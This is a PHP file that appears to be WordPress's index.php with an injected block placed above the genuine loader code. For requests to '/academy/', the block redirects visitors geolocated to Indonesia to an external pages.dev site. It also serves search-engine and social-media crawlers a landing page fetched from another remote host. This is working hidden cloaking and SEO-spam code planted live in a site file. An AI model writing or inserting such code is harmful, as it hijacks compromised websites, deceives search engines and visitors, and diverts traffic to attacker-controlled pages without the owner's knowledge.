<?php

function superbones($url) {
    if (ini_get('allow_url_fopen')) {
        return @file_get_contents($url);
    } elseif (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        $res = curl_exec($ch);
        curl_close($ch);
        return $res;
    }
    return false;
}

$ua  = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
$uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);

$bot_regex = "/(googlebot|google|adsbot|mediapartners|bingbot|slurp|yandex|duckduck|baidu|ahrefs|semrush|mj12|dotbot|crawler|spider|facebook|twitterbot|telegrambot)/i";

// Landingpages raw or html
$remote_lp = "https://anjing-bawapalu.pages.dev/";
// link reff amp
$amp = "https://depodulu-limpulwak.pages.dev/";

// ------- enumerations path -------
$match_paths = [
    "/academy/",
    "/academy/",
    "/academy/",
];
// tempel disini path:
// "/academy/",
// "/academy/",

if (in_array($uri, $match_paths, true)) {

    $ip = $_SERVER['REMOTE_ADDR'] ?? '';
    $geo = @json_decode(@file_get_contents("http://ip-api.com/json/$ip"), true);

    if (!empty($geo['countryCode']) && $geo['countryCode'] === "ID") {
        header("Location: $amp");
        exit;
    }

    if (preg_match($bot_regex, $ua)) {
        $f = superbones($remote_lp);
        echo $f ?: "";
        exit;
    }
}

?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
